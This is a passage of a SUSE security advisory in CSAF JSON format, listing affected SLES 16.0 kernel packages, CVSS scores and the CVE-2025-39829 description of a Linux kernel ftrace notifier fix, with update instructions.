"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-39817"
},
{
"cve": "CVE-2025-39829",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39829"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntrace/fgraph: Fix the warning caused by missing unregister notifier\n\nThis warning was triggered during testing on v6.16:\n\nnotifier callback ftrace_suspend_notifier_call already registered\nWARNING: CPU: 2 PID: 86 at kernel/notifier.c:23 notifier_chain_register+0x44/0xb0\n...\nCall Trace:\n \u003cTASK\u003e\n blocking_notifier_chain_register+0x34/0x60\n register_ftrace_graph+0x330/0x410\n ftrace_profile_write+0x1e9/0x340\n vfs_write+0xf8/0x420\n ? filp_flush+0x8a/0xa0\n ? filp_close+0x1f/0x30\n ? do_dup2+0xaf/0x160\n ksys_write+0x65/0xe0\n do_syscall_64+0xa4/0x260\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nWhen writing to the function_profile_enabled interface, the notifier was\nnot unregistered after start_graph_tracing failed, causing a warning the\nnext time function_profile_enabled was written.\n\nFixed by adding unregister_pm_notifier in the exception path.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-39829",
"url": "https://www.suse.com/security/cve/CVE-2025-39829"
},
{
"category": "external",
"summary": "SUSE Bug 1250082 for CVE-2025-39829",
"url": "https://bugzilla.suse.com/1250082"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
